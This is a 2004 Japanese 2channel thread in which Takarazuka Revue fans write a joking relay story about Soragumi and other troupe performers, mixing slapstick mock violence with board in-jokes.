304 :名無しさん@花束いっぱい:04/04/13 11:25 ID:hlQp6LlO
つまんね〜スレだす。
もっと気の効いたこと書けないの?

305 :名無しさん@花束いっぱい。 :04/04/13 11:29 ID:qpqW/xrb
304はsageを憶えてから意見をおっしゃいな、と
柄にもなく寛容なまりたん@CDはタカコさんと二人で出しますわ。

306 :名無しさん@花束いっぱい:04/04/13 12:40 ID:zLGC7v1X
害虫は氏ね!!

307 :名無しさん@花束いっぱい。:04/04/13 13:08 ID:yrcXY7XF
304の誤字はつまらない誤字なので、2ちゃん的には失格ね。
出直していらっしゃい。と微笑むまりたん

308 :名無しさん@花束いっぱい:04/04/13 15:45 ID:Vt3NhlFI
そうでつね。
あなたのような邪悪な人がのさばるとこです。2chは@まりの後ろからそっと
呟くたかこ

309 :名無しさん@花束いっぱい。:04/04/13 17:19 ID:PekD/ZYi
それじゃあ花娘1のことでも誉めるか……と思ってみたものの、
キーボードをうつ指が止まったまま動かない彩音@正直者




310 :名無しさん@花束いっぱい。:04/04/13 17:59 ID:J+hUWBiD
彩音!あんたはなんでいいとこで指が動かなくなるの!もういいわ、
私がやる!と試みたもののPCの使い方がわからない薄幸美少女専科@アリス

311 :名無しさん@花束いっぱい。:04/04/13 21:02 ID:IYAxeRba
300をgetしそこねて、400ゲトのためにPCに張り付いていたタカコ、
臨時アリス家庭教師に。またこの顔に仕えるのか;;

312 :名無しさん@花束いっぱい。:04/04/13 22:15 ID:H4cTNKPB
彩音!あんたはなんで可愛い子ぶってスター気取りなの!もういいわ、
私がヅカの娘役のトップになるわ!と意気込んだものの、病弱夭逝下町の美少女専科で
役の広がりの無かったアリス@シャンテの壁の穴のウェイトレスは不幸にして生き別れた双子か!

313 :名無しさん@花束いっぱい。:04/04/13 22:18 ID:H4cTNKPB
過去スレ読んでいない方に、補足修正>312

@日比谷シャンテの壁の穴のウェイトレスは、
不幸にして生き別れたアリスの双子の姉妹か!

314 :名無しさん@花束いっぱい。:04/04/13 23:27 ID:RamMETnS
>日比谷シャンテの壁の穴のウェイトレスは、
>不幸にして生き別れたアリスの双子の姉妹か!

これ、たしか「そっくりな店員が」スレに冗談で自分が書いたネタなんだけど
このスレでも出てたの? そっくりそのままケコーンてこと?

315 :名無しさん@花束いっぱい。:04/04/13 23:28 ID:jSY0WiZr
アリス。。。双子なら揃って合格できたのにもったいないわ@珍しく自分からアリスにメール喪神する彩音。
どこまでも人のよい彩音に堪忍袋の緒が切れそうな一花@初登場かしらん

316 :名無しさん@花束いっぱい。:04/04/14 00:07 ID:K9OE8ar7
>日比谷シャンテの壁の穴のウェイトレスは、
>不幸にして生き別れたアリスの双子の姉妹か!

顔も声もそっくり。
向かいの〜の踊り子の〜姉さんと〜@薄幸病弱夭逝専科アリス

317 :名無しさん@花束いっぱい。:04/04/14 00:10 ID:O22BXCaV
ワタクシの数あるクリーンの一人がウェトレスなどをしてるとは・・・
ショックで寝込むマリタン。

318 :名無しさん@花束いっぱい。:04/04/14 00:26 ID:K9OE8ar7
清く正しく美しく、通りのクリーンですわ>316@まりたん

319 :名無しさん@花束いっぱい。:04/04/14 09:54 ID:ORPfRiNg
317のクリーンはクローン=クロン(マリタンの特許)の間違いでは?と
言いたいのに言えない…気に病む遼河はるひ@ますます鬱

320 :名無しさん@花束いっぱい。:04/04/14 14:07 ID:GARoj1dS
「それ、クロンでつよ〜!」と笑顔でまりたんに突っ込むタニ。
笑顔でタニを簀巻きにし、武庫川へ投げ込むまりたん。
物陰から助けるべきかどうか考え込む遼河はるひ。

321 :名無しさん@花束いっぱい。:04/04/14 19:51 ID:p+WgsERH
日比谷シャンテの壁の穴って、工事中でつか?@タニ

322 :名無しさん@花束いっぱい。:04/04/14 21:14 ID:rIWU6vO6
もうそのネタは終わったんだよ!@最近8に出入りしているアリス、タニに毒づく

323 :名無しさん@花束いっぱい。:04/04/14 23:11 ID:jJJJXy1I
壁の穴の女店員と終演後に交代して、
王子と少年ごっこを企画するアリス@店で働き自分の評判を聞きたい

324 :名無しさん@花束いっぱい。:04/04/15 00:16 ID:JjKz6Nw/
店名でマリタンにご優待券送り、呼び寄せる。

給仕しつつ料理にコラ-ック100錠砕いて混ぜ混ぜ…@明日の公演が楽しみなアリス。

325 :名無しさん@花束いっぱい:04/04/15 01:06 ID:kXQgHlU4
出されたコーラをお前が飲めとアリスに突きつけるまりたん
@ホホホ、年の功をおなめになるんじゃありませんことよ!

326 :名無しさん@花束いっぱい。:04/04/15 03:56 ID:JjKz6Nw/
325タン、コーラじゃなくてピンクの小粒のコラーックですわ@324に乗り移ったマリタン

327 :名無しさん@花束っぱい:04/04/15 11:37 ID:FHUSbJki
宙組のネタばかりでもう飽きましたわと欠伸をするマリ@どんなに飽きられても
続けることに価値があるのですと真剣な表情でマリを見つめるたかこ。自己満足は
もういいよとファンの大合唱が響き渡る。

328 :名無しさん@花束いっぱい。:04/04/15 13:12 ID:uSH6QKNi
327の書込みをマリタンの指示どーりに打ち込みが終わり
涙目で画面を見つめる和央ようか。
ちょっとした悲劇や非難は組子との愛の絆を強めますわ!と
満足げなマリタン@春爛漫。


329 :名無しさん@花束いっぱい。:04/04/15 16:19 ID:TMH9b2jQ
コーラックを床に投げ捨て「3日間水しか飲んでないんだよね」コーラックを
踏み潰しながらカクテル・パートナーの
ビンをクイッ!怖いもの知らずのアリス。そしてそれを見て
「3日間でなれるの!?」とメモるタニ。

330 :名無しさん@花束いっぱい。:04/04/15 17:25 ID:M8yktH/c
アリスと交代した壁の穴の女店員は、いつもと違う、馴れぬ様子での出が可愛いと
ファンの歓声を浴びたことで、そのままヅカにいつづける事を決意し、
本当に王子と少年の話になってしまった事に気づいていないアリス

331 :名無しさん@花束いっぱい。:04/04/15 21:33 ID:JTgrYQlZ
新人公演楽しみだわ、壁の穴の貴女にできまして?@いつになくアリスを庇うマリタン
アリスを微笑みながら虐めるのが生きがいのマリタン、新公に向けてヘラヘラ。

332 :名無しさん@花束いっぱい。:04/04/15 23:27 ID:I4MNfrMo
壁の穴でスパゲテー食べまくりのかなみん@全メニュー制覇

333 :名無しさん@花束いっぱい。:04/04/16 12:13 ID:Int/9Yo2
壁の穴で食べまくっているかなみんの皿に、わんこそばの様に
次々パスタを放り込むアリス@狙いは何!?

334 :名無しさん@花束いっぱい。:04/04/16 18:19 ID:/FTBkRK2
「このほうが楽だなあ〜〜かなみも太らせられるし」と
本気で転職を考えるアリス@体重30キロ代

335 :名無しさん@花束いっぱい。:04/04/16 19:55 ID:0xNOwKmj
本気で転職どころか、もう宝塚には戻れなくなっているアリス@壁の穴

336 :名無しさん@花束いっぱい:04/04/16 22:12 ID:f56jm8LW
その壁の穴を潰しにかかるまりたん@邪魔者は消えましたわ


337 :名無しさん@花束いっぱい。:04/04/16 23:01 ID:JMjCVBlm
米国の音痴を競うオーディションにエントリーするために荷造りをする
タニ@オーディションのソースは芸スポ速報板

338 :名無しさん@花束いっぱい。:04/04/16 23:10 ID:EcIhD6y3
あら私は48キロってご存知かしら@米倉菊川と並んでにっこりリカタン
ところでアリスって誰??自分の話題に切り替えるリカタン@タニの話はシカトかい

339 :名無しさん@花束いっぱい。:04/04/17 00:46 ID:EkX3hupZ
そしてついに、大劇場お稽古場デビューを迎えた新アリス@元壁の穴女店員

340 :名無しさん@花束いっぱい。:04/04/17 17:23 ID:ezzfWWTE
実は新アリスタン(略して新アリ)はバレエの名手@壁の穴転院は世を忍ぶ仮の姿。
バレエ界の星の座を振り切りジェンヌになるべくスクールに通ったユウコタンにも似た過去があった!!


341 :名無しさん@花束いっぱい。:04/04/17 19:56 ID:CbowojR7
一方、旧アリスは壁の穴で、まだかなみに
給仕を続けていた。

342 :名無しさん@花束いっぱい。:04/04/18 19:01 ID:xCBDE8UF
自分がバツ4だと思ってないマリタン@夫を次々と替える女性は許せませんわ

343 :名無しさん@花束いっぱい。:04/04/18 21:15 ID:KD8LGCx5
「私は未だ一度たりとして、夫をしりませんわ」@かなみん
「わんこパスタ、入れまっすよ〜」@旧アリス

344 :名無しさん@花束いっぱい。:04/04/18 22:03 ID:jTHWv+Oi
ますます油の乗る新アリ
なりきりぶり絶好調@もう以前の生活には帰らないわ。

345 :名無しさん@花束いっぱい。:04/04/18 23:12 ID:VvY+WOfs
壁の穴でわんこパスタを食べているかなみん
とそこに公演を終えて食事にきてその光景を目撃するあさこ@将来のかなみんの夫候補?

346 :名無しさん@花束いっぱい。:04/04/19 00:24 ID:WPnj0iRk
ますます油の乗るかなみん。
太りきりぶり絶好調@もう以前の体重には戻れないわ。

サンクス>344

347 :名無しさん@花束いっぱい。:04/04/19 11:15 ID:g2zl5Hml
ますます油の抜け切るミズ
きりきり、やつれて絶不調@もうかなみんは持ち上げられないわ。

サンクス>344タン

348 :名無しさん@花束いっぱい。:04/04/19 13:55 ID:u78eFgJA
ますます油の抜けきるタカコタン。
こむみタソ&マリタンにギューギュー絞られ@もう力が尽きますた、お許しください。

サンクス>344殿


349 :名無しさん@花束いっぱい。:04/04/19 15:30 ID:iyrUPIEZ
実はかなみ並に歌が上手かった新アリス。気づき始める組子たち@組内5分の2

350 :名無しさん@花束いっぱい。:04/04/19 20:26 ID:HAUXtcjX
ますます油を売るタニ。
おちゃらけぶり絶好調@もうシリアスな二枚目はできないわ。

サンクス>344タン

351 :名無しさん@花束いっぱい。:04/04/19 21:00 ID:UiPS8ezO
かなみから溢れ出る油を全身に塗りまくり
お肌ピカピカのまりたん@これなら17才も無理ないですわ!

サンクス>344さん クスッ。

352 :名無しさん@花束いっぱい。:04/04/19 21:54 ID:ynlef2f4
マリババ、カナミン油(ゆ)をボデー塗りまくり
睡眠中のカナミンに漏斗を使い毒薬を注ぐアリス@もっと体液毒を溢
れさせるがいいわ

サンクス>344タン フフッ


353 :名無しさん@花束いっぱい。:04/04/20 21:25 ID:R1TxcEIl
お稽古場で絶賛を浴び、ますます己が信ずる道を行く新アリス。
人を貶めることに熱心になり、毒づきキャラ街道邁進中の旧アリス
@本公演で物語の重要な一翼を毎回荷負い、いったい何が不満?

354 :名無しさん@花束いっぱい。:04/04/20 21:27 ID:R1TxcEIl
353>

サンクス>344タン

355 :344:04/04/20 22:19 ID:8PropvzR
あらワタシ?どぅいたしますて。(・∀・)

356 :名無しさん@花束いっぱい。:04/04/21 00:19 ID:NFlheEUh
いつになったらまともな稽古が始まるんだろう?
と着物姿で横になりながら思う安蘭けい
その横でナウオンの台本を
着々と書き上げて行く樹里

357 :名無しさん@花束いっぱい。:04/04/21 18:13 ID:p0Qj0FFD
「アリとキリギリスの物語」を亜蘭と樹里に読み聞かせ、人生を説く新アリス。
新旧入れ替わってもアリスはアリス@明日は「花とアリス」見ようっと

358 :名無しさん@花束いっぱい。:04/04/21 19:00 ID:V0+vRhro
356の光景になんとなく萌え。

359 :名無しさん@花束いっぱい。:04/04/21 19:18 ID:3YDzHxWK
ネタ帳を取り出してネタを整理しているうちに
ナウオンの台本であることを忘れ、漫才を書き始める樹里
樹里に言われてスタンドマイクを探しに行くとうこ


360 :名無しさん@花束いっぱい。:04/04/21 20:34 ID:v8NNKFZU
どうすればハリセンのいい音が出るかの実験台にされ
樹里にバシバシ叩かれ半ベソかくとうこ

361 :名無しさん@花束いっぱい。:04/04/21 20:45 ID:Lb3xCTKv
できあがった台本のあまりのすばらしさに
吉本に売り込みに行く樹里
相方として引きずっていかれ泣き出さんばかりのトウコ

362 :名無しさん@花束いっぱい。:04/04/21 20:56 ID:rh0W64oI
トウコさん、次は上方漫才大賞を狙っているでつね!と陽気なタニオカ

363 :名無しさん@花束いっぱい。:04/04/21 21:23 ID:5eBQfij4
だんだんその気になってきて意気込むトウコ@やるからには1番や!!

364 :名無しさん@花束いっぱい。:04/04/21 21:46 ID:Lk0WvVz9
「確かにやるからには1番ですわね、たかこさん、ホホホ」
泣く泣く机に向かい、徹夜で漫才の脚本を書く和央ようか。

365 :名無しさん@花束いっぱい。:04/04/21 22:09 ID:0dtM2tc3
一方、旧アリスは壁の穴で、まだかなみに
給仕を続けていた。

366 :名無しさん@花束いっぱい。:04/04/22 00:18 ID:YWLijUpO
気がつくと爆笑オンエアバトルしてるトウコと樹里@所属はなぜか松竹芸能!


367 :名無しさん@花束いっぱい。:04/04/22 00:38 ID:Os8hbAET
某8に「ファントム漫才決戦!タカハナVS樹里トウコ」のスレを立てる新アリス

ゴールデン漫才コンビの冠を巡って火花を散らす4人。

368 :名無しさん@花束いっぱい。:04/04/22 02:16 ID:7FFtLSQN
うまい!座布団100枚!

369 :名無しさん@花束いっぱい。:04/04/22 05:53 ID:zga7c9Kb
「ヅカのファントムはお笑いらしい」との噂が広まる四季ファン
「えっ…じゃあ新人公演もお笑いにしないといけないのかしら」と
不安になる七帆@どうでもいいけど相手役決めてくれ

370 :名無しさん@花束いっぱい。:04/04/22 06:23 ID:MXlvGfS2
新公の相手役が森三中という噂が流れ、動揺する七帆ひかる。

371 :名無しさん@花束いっぱい。:04/04/22 10:07 ID:a9KGPHB2
まあ新公のお悩み?そんなこと私にお任せなさいな
ドーーーンと大船に乗った気でいるのはアリスばかり

372 :名無しさん@花束いっぱい。:04/04/22 12:09 ID:XOrisNEb
稽古中の新アリスを見て、
「アリスはいつの間に、こんなに上達したのか!?」
今回は途中で死なすのは惜しい。最後まで出そう。」
と考えを改める中村先生@潤色よ

373 :名無しさん@花束いっぱい。:04/04/22 20:39 ID:iBnSvsnY
いいえ!!なりませんひと思いにお願しますわ@ナカムラセンセにマリタン直訴
醗酵の美少女はワタクシ1人で充分でですわ



374 ::04/04/22 20:40 ID:iBnSvsnY
で、が一つ多かったのですわクス

375 :名無しさん@花束いっぱい。:04/04/22 21:52 ID:uGoq1GCP
実は新公もアリスの代役で出演しようと企んでいるまりたん

376 :名無しさん@花束いっぱい。:04/04/22 22:37 ID:wULyk52A
手始めにアリスを吊るし上げるマリタン

377 :名無しさん@花束いっぱい。:04/04/22 22:51 ID:pfS5O6YG
宙組改め花總組。
花總は娘役初の「トップスター」として主演。
和央はトップスターでなく「トップ男役」。
新公主演はアリス。
路線娘役は花總似の娘役で占められる。

378 :名無しさん@花束いっぱい。:04/04/22 23:14 ID:RKc6iHdS
いいえ、路線娘役など存在しませんわ。
ワタクシ(とタカコサン)の愛する宙組のトップは今も昔もワタクシ1人、
勿論未来もワタクシのみですわ、と笑う花總まり

379 :名無しさん@花束いっぱい。:04/04/23 12:13 ID:nythOnaX
先に、壁の穴でかなみにあったとき、ちらと出演したが、
その後スルーされて、ネットで宇宙人気を痛感しブルー
入るアサコ@王子様よ

380 :名無しさん@花束いっぱい。:04/04/23 12:14 ID:nythOnaX
ネットでの宙人気

に修正

381 :名無しさん@花束いっぱい。:04/04/23 14:31 ID:xHiiIZEx
シナ・彩音・新アリ・旧アリこちらへおいでなさいな!
私達で「マリタンズ」を結成しませんこと?@いつになく上機嫌マリタン
花顔4人生きた心地なし・・・。

382 :名無しさん@花束いっぱい。:04/04/23 15:26 ID:1u0ngWdm
どうせ引き立て役でしょ   @旧アリス
私がトップに上るわ。    @新アリス
シナタンズ」じゃないの?  @シナ
・・・・ど、どうしよう。  @彩音

383 :名無しさん@花束いっぱい。:04/04/23 17:23 ID:nythOnaX
花:彩音
月:新アリス
雪:シナ
星:旧アリス
宙:まりたん

90周年代の娘1は上記に決定よ>飢えだりじちょ@キング オブ 娘役まりたん

384 :名無しさん@花束いっぱい。:04/04/23 22:47 ID:NJy7IFF6
「宙」を「そら」で登録なさい!@379にちょっとご不満なマリタン

385 :名無しさん@花束いっぱい。:04/04/23 23:05 ID:8NkMGuaQ
「ちゅう」で変換しても普通に「宙」ってでまつよ、とタニ。
しかし「ちゅう」で変換して一番最初に出てくる漢字は
「厨」な、ちゃねらータニのパソコン。

386 :名無しさん@花束いっぱい。:04/04/24 12:37 ID:G0IDEXHb
379で花にネタ振りされたのに、
相変わらずスルーされて、花組の為に
お出ましになるオサ@二役しんど

387 :名無しさん@花束いっぱい。:04/04/24 13:46 ID:zR2hurWb
ど、ど、どうしよう??おささんが困ってる??
何していいかわからずにタンスを持ち上げてしまった火事場の馬鹿力@彩音

388 :名無しさん@花束いっぱい。:04/04/24 18:59 ID:MqCZOZke
ど、どうしよう?が口癖なの?と訊ねるかなみん@食堂の馬鹿力

389 :名無しさん@花束いっぱい。:04/04/24 20:11 ID:aM7dOhHa
どど、ど、、どうしよう???かなみんさんからツッコミ入りました@ビビりまくり彩音
彩音の「ど」が、ますます増えていく悪寒を感じる@3度の飯より魚が好きアリス


390 :名無しさん@花束いっぱい。:04/04/24 22:02 ID:8KU43sA6
389の2行目の意味がわからなくて珍しく考えこむマリタン@最近たかこさんがいないわ

391 :名無しさん@花束いっぱい。:04/04/24 22:14 ID:qq4FDTyv
マリタン読解力なさ杉。。。
とつぶやくシナタン@夜食は大人のベビースター

392 :名無しさん@花束いっぱい。:04/04/24 22:29 ID:HCNXQTNb
391を夜食にばりばり食らうまりたん。

393 :名無しさん@花束いっぱい。:04/04/24 22:39 ID:q0YwX7W6
そっと塩コショーを渡すタカコさん
お相伴に預かるかなみん
何も分からずただ横で笑ってるだけのタニ

394 :名無しさん@花束いっぱい。:04/04/24 22:48 ID:y8eBT0TH
392のまりたんはまずそうだから
私は遠慮しますね
そっと微笑む彩音たん

395 :名無しさん@花束いっぱい。:04/04/24 22:56 ID:gLEVj2p7
そっと塩コショーをしまうタカコさん
ご辞退するかなみん
何も分からずただ横で笑ってるだけのタニ命知らず




396 :名無しさん@花束いっぱい。:04/04/24 23:51 ID:6nYDErVR
ど、どうしよう?が口癖なの?彩音。と訊ねるアリス@マジ

397 :名無しさん@花束いっぱい。:04/04/25 11:24 ID:ZBy2lMoa
何言ってんの?うちら88期の秘密じゃん@いささか不機嫌、斗南 さきら
 

398 :名無しさん@花束いっぱい。:04/04/25 16:47 ID:aVg8Qevw
無名の下級生のくるところじゃありませんわ。お帰り!
マリタンの一喝……かと思いきや、アリス&彩音@同期愛なんて知らない

399 :名無しさん@花束いっぱい。:04/04/25 22:37 ID:CpsEm7LM
ドンチョウノ カゲ|_・)(アリスト イッショニシナイデ…)

彩音の主張@音量最小

400 :彩音399:04/04/25 23:00 ID:CpsEm7LM
(ド、ド、ド、ドウシヨウ カイチャッ) サササッ、………( ..)

彩音の心@アリス知らず

401 :彩音399:04/04/25 23:02 ID:CpsEm7LM
タ、ガヌケチャッタ…

402 :名無しさん@花束いっぱい。:04/04/26 00:32 ID:GEtUItGV
あら彩音サンキュー@
軽くダジャレを織り込みつつスルーありすたん


403 :名無しさん@花束いっぱい。:04/04/29 11:48 ID:F885u6zo
よく分からないダジャレで
スレの進行を止めたアリスを
火あぶりにするまりたん

404 :名無しさん@花束いっぱい。:04/04/29 12:19 ID:pc95LHqf
干物をあぶってるのかと思い、コンガリ出来上がるのを待ってるかなみん@レモン汁持参
横で何がなんだかわからないけどとりあえず笑って待ってるタニ@箸と皿持参


405 :名無しさん@花束いっぱい。:04/04/29 13:12 ID:6CrRZXcz
あさこに続き彩音もスルーされて、
花組のネタ性の低さを再度嘆くオサ@おとめの表紙は爬虫類

406 :名無しさん@花束いっぱい。:04/04/29 14:53 ID:U5KFD/za
アリスの火あぶりよりも
火あぶり処刑人のまりたんを
火あぶりにしてみたいかなみん


407 :名無しさん@花束いっぱい。:04/04/29 16:19 ID:Nthv7IfV
そして火あぶりにされるかなみん@アブラがのってて美味しそう

408 :名無しさん@花束いっぱい。:04/04/29 17:48 ID:5YtHh7wh
その体には十字架が!

409 :名無しさん@花束いっぱい。:04/04/29 18:03 ID:pc95LHqf
わけもわからずワクワクしているタニ@手にはまだ箸と皿

410 :名無しさん@花束いっぱい。:04/04/29 19:51 ID:PMOjJNx0
アブラがもえつきてスリムになって火の中から現れたかなみん

411 :名無しさん@花束いっぱい。:04/04/29 21:07 ID:5YtHh7wh
これで最大の難題は解決したわ。
ミズの腰も大丈夫。
もう娘1はわたしのものよ@かなみん

412 :名無しさん@花束いっぱい。:04/04/29 21:13 ID:kOU2OxhD
そして
まりたんをバリバリ食らうありすたん@新公風味




413 :名無しさん@花束いっぱい。:04/04/29 21:22 ID:/jZO8BFA
ぶっさんってどう見ても17には見えないわ
と思っているワタクシ@誰でしょう? クス

414 :名無しさん@花束いっぱい。:04/04/30 02:22 ID:kS2onrxc
412のアリスタンを声を潜めながら応援する宙組子。
アリスタンをバリバリ食いにくるだろうマリタン若作りメイクに熱中@宵っ張り。

415 :名無しさん@花束いっぱい。:04/04/30 06:06 ID:23mGYVmA
これで最大の難題は解決したわ。
アリスの娘1の座も安心。
もう娘1はわたしのものよ@壁の穴店員はどうした?


416 :名無しさん@花束いっぱい。:04/04/30 08:19 ID:pb1+sVga
ど、どどしたっていわれても〜??
ど、どどどど、ど、どしよう???

藁人形さん助けて、牛の告参り状態@彩音たん


417 :名無しさん@花束いっぱい。:04/04/30 10:36 ID:VRGD1ZVN
ど、どどうしたっていわれても〜??
ど、どどどど、ど、どうしよう???

彩音タンにメロメロ@新しいもの好きタニ



418 :名無しさん@花束いっぱい。:04/04/30 20:01 ID:qO2nkWHM
なんで、彩音たんの時に、そんなにどもるの?>タニ

419 :名無しさん@花束いっぱい。:04/04/30 21:27 ID:kwG9zm3/
アリスと宙組トプになるか、彩音と花組トプになるか、
楽しく迷っているタニ@脳内花畑

420 :名無しさん@花束いっぱい。:04/05/01 00:05 ID:4CCsXTmu
相手役をどっちにするかまよえるだけでも
タニちゃんがうらやましいたかこさん

421 :名無しさん@花束いっぱい。:04/05/01 00:22 ID:WA78rBPR
でもどっちを選んでもマリタン顔・・・
余計鬱になるタカコ@私はこの顔から離れられない・・・

422 :名無しさん@花束いっぱい。:04/05/01 00:55 ID:uSm9hUuf
マリタン顔二つの間に何も考えていないタニの顔があり、
鬱が進行するタカコさん

423 :名無しさん@花束いっぱい。:04/05/01 01:28 ID:qcGiUYOj
じゃあ専科に来る? 帰るところがないのも大変なのよ、とのたまう同期の天照ガイチ

424 :名無しさん@花束いっぱい。:04/05/01 01:42 ID:X+tjSrXT
まり、専科で待ってる@タカコ

425 :名無しさん@花束いっぱい。:04/05/01 05:48 ID:KHSbzm8j
じゃあ専科に来る? 帰るところがないのも大変なのよ、とのたまう同期じゃないけどジュビリーズ・ド・樹里


426 :名無しさん@花束いっぱい。:04/05/01 08:15 ID:ifPMiKkn
よく考えたら、専科は仲良しばかり@たかこ

427 :名無しさん@花束いっぱい。:04/05/01 11:55 ID:rOkx/cGA
戦火ってさ、10人いたのよね・・確か・・・
4人トプ退団、2人はトプじゃないが退団か。フッ(苦笑)
残りは私達だけだもんねえ@感慨浸るガイチ&ジュビリーズ・ド・樹里


428 :名無しさん@花束いっぱい。:04/05/01 16:19 ID:ctzRERY9
専科も2番手シャッフルも、その場しのぎにすぎない。
金コネ入学やめにして、じつりょくとやる気と将来性で
採用してください>うえだりじちょ


429 :有名人。@UK:04/05/01 16:22 ID:3qWgiuBr
花:伊織
月:初風
雪:汐風
星:彩輝
宙:湖月

新専科がなければ、悪夢になるところでした...

430 :名無しさん@花束いっぱい。:04/05/01 22:01 ID:qcefwmJS
>>429
スレ違いは見苦しいわね@お稽古真っ最中なのにパソコンに向かうマリタン

431 :名無しさん@花束いっぱい。:04/05/02 15:08 ID:7GrpNjp4
書き方しらねぇんだったら当分ロムれやゴルァ!
厨がまぎれてるんじゃねぇよ!と悪態をつくアリス@ガイチだ樹里だのババァの話しはもういいんだよ

432 :名無しさん@花束いっぱい。:04/05/02 22:01 ID:wKLlhmWF
なんて下品な物の仰い方!怒ったマリタン@火あぶり決定ね。
いつにしようかスケジュールを立ててるwithかなみん

433 :名無しさん@花束いっぱい。:04/05/03 00:03 ID:6pGgpEOT
431様怖い。。。@彩音仰け反り

434 :名無しさん@花束いっぱい。:04/05/03 02:13 ID:9lNTH5VU
反ってる彩音だとは知らずに上に座るマリタン@座り心地悪いわ
その横でマリタンの合わせた山のような衣装をたたみまくる和央ようか@今日も遅くなるわ

435 :名無しさん@花束いっぱい。:04/05/03 08:10 ID:6pGgpEOT
骨太ぶっさんに乗っかられ身も心もガタガタの彩音
コソ-リ見舞いに通いつめるタカコ@お世話は得意

436 :名無しさん@花束いっぱい。:04/05/03 09:03 ID:rvb0NJ4W
彩音、美しい。若き日のまりたんのよう(ホ)@タカコ

437 :名無しさん@花束いっぱい。:04/05/03 11:24 ID:e9VSKpPI
いつかアナタを私の相手役にして見せるわ!と、タカコ@次の女帝・・・いいえ、私の相手役!

438 :名無しさん@花束いっぱい。:04/05/03 17:08 ID:6pGgpEOT
たかこさん、アリスも忘れないでください@可愛子ちゃんにモテモテたかこさん

439 :名無しさん@花束いっぱい。:04/05/03 17:24 ID:tD1k7P36
彩音タンとアリスタンどっちにするんでつか??
お見舞いのバナナに食いつきながら
タカコにクエスチョン@タニ

440 :名無しさん@花束いっぱい。:04/05/03 17:28 ID:UpwSmxCh
ダンスの上手い方うにしたら@桜乃嫌ね(さくらのいやね)
歌の上手い方にしたら@儚げアリス(はかなげありす)



441 :名無しさん@花束いっぱい。:04/05/03 18:29 ID:WsxOurkj
ちょっとでかいけど、キャリアはまあまあ同じ顔よ。
たかこさん私は〜?@右京女装中

442 :名無しさん@花束いっぱい。:04/05/04 08:50 ID:LH/yShtF
右京タン、女役転向したんでつか〜〜??@相変わらずピンボケたに。

443 :名無しさん@花束いっぱい。:04/05/04 12:34 ID:i51Z6y2b
車3理事に言葉を失う花總まり

444 :名無しさん@花束いっぱい。:04/05/04 15:12 ID:E9BXBnY6
わけわからんことをカキコした443は消えておしまい!と魔法の杖を
一振りするまりたん@ファントムの次は妖精の女王もいいわね

445 :名無しさん@花束いっぱい。:04/05/04 15:53 ID:dfP6X79O
一振りした先に何故かタニが居りうっかり呪いがかかってしまうが
ものともせず笑っているタニ@最強無敵

446 :名無しさん@花束いっぱい。:04/05/04 18:49 ID:XEXI9Q1w
タニは糸目ビームくぐりの達人です!とタカコが教えるtoマリタン
糸目ビームがダメ?じゃあ、次はナニをしようかしら@ニヤニヤ

447 :名無しさん@花束いっぱい。:04/05/05 02:40 ID:Srtij5bz
そんな喧騒を離れて今日もお見舞い
人里離れたサナトリウムで彩音の車椅子を押すたかこ・・・

448 :名無しさん@花束いっぱい。:04/05/05 11:09 ID:0aWaEj66
何か、アニメの1シーンのよう。
素敵な感じ。

449 :名無しさん@花束いっぱい。:04/05/05 11:38 ID:HCzLxWoW
ここにくるとバナナがありまつーとかなみんとともにサナトリウムにやってくるタニ
ああまたあの喧噪が・・涙目タカコ

450 :名無しさん@花束いっぱい。:04/05/05 16:43 ID:5qX7fknM
「これこれ関係者以外立ち入り禁止ですよ!」
優しく諭す、看護師長出雲あやと、主任美々杏里。




451 :名無しさん@花束いっぱい。:04/05/05 20:54 ID:6900Y1DD
かなみんは、出雲あやを一目観るなり、
「お姉さん!」
と叫ぶ。
二人は生き別れた姉妹であった。

452 :名無しさん@花束いっぱい。:04/05/05 23:19 ID:bn63T6Xf
姉妹ではなく分身であった。

453 :名無しさん@花束いっぱい。:04/05/06 03:01 ID:XvuP9JkW
生き別れた姉妹って…分身って…。
単に二人とも大食いなだけでしょ!と冷静にバナナを撒き散らしつつ
歩くアリス。
バナナにむらがるかなみん・たき組長・タニ@動物園かここは

454 :名無しさん@花束いっぱい。:04/05/06 08:35 ID:mF+/FN1M
(病室に寝ている彩音。タカコは売店に行っている、そこへアリス入室)

彩音!忙しいあたしが見舞いに来てあげたよ@見舞いの花は、鉢植えアリス

(そこへ、売店から戻ったタカコ入室)

彩音ちゃん!心配で食事も喉を通らなかったわ!@涙ぐむアリス態度激変。





455 :名無しさん@花束いっぱい。:04/05/06 11:50 ID:RNs4J2y5
入りの悪いさえこの舞台を庭でけなげに誉め讃えてるファンを尻目に@
そんなことしてもチケットは売れないのよ。自分で買い取る財力がなければ
トップを維持するのは難しいとうそぶくたかこ。
なるほど人気と実力を凌駕するのが財力なのね〜と妙に納得するヅカファン。

456 :名無しさん@花束いっぱい。:04/05/06 15:50 ID:c/Vwnzad
無粋な>>455を庭に埋めるまりたん

457 :名無しさん@花束いっぱい。:04/05/06 16:27 ID:XvuP9JkW
そこへ桃の木を植えるかなみん。
プラスチックのじょうろで水をかけるタニ。
そのまましゃがみこんで、実のなるのを待つ2人@天然の食い気

458 :名無しさん@花束いっぱい。:04/05/06 18:44 ID:lvug8lqQ
その前に鉢植えアリスをどうにかして!疲れのため、鬱になった彩音@精神科に病室を移す。

ごめんね!早くナンとかするから!!後で捨ててきてあげるから@たかこ

そこに、初代宙組トップのズンコと花組トップのオサが現れ「今こそお前を黄泉の世界へ迎えよう」と歌う@本物の死神と勘違いしショックで一週間昏睡状態が続いた彩音

459 :名無しさん@花束いっぱい。 :04/05/06 19:15 ID:y41Twoid
そんな大芝居をよそに
まだ桃の木を見守ってるタニとかなみん@無邪気な傍若無人

460 :名無しさん@花束いっぱい。:04/05/06 19:40 ID:mb+aodR/
長く待ちすぎて根っこが生えてしまったタニとかなみん@だれか食料を〜〜;;

461 :名無しさん@花束いっぱい。:04/05/06 20:22 ID:JPSJ1So4
しょうがないわね、と差し入れを持ってきたミズ@二人の扱いはアナタが一番!
ついでにタニ愛用のぞうさんじょうろで二人にミズを与えておく@???ミズ??
わーい虹がかかりますたー♪とあくまでも今を楽しむタニ@その姿勢には頭がさがる

462 :名無しさん@花束いっぱい。:04/05/06 21:07 ID:shFuLVwo
検温の時間だから、お付き添いの方はあちらへ〜@病室からタカコを追い出し、
病人と入れ替わろうとする女装のナース右京

463 :名無しさん@花束いっぱい。:04/05/06 21:28 ID:6VrNtTAS
最近つまらなくなったな・・・スレが伸びすぎたのかな・・・
と画面を見ながらつぶやく遼河はるひ@鬱組のメンバーが増えたわ・・・

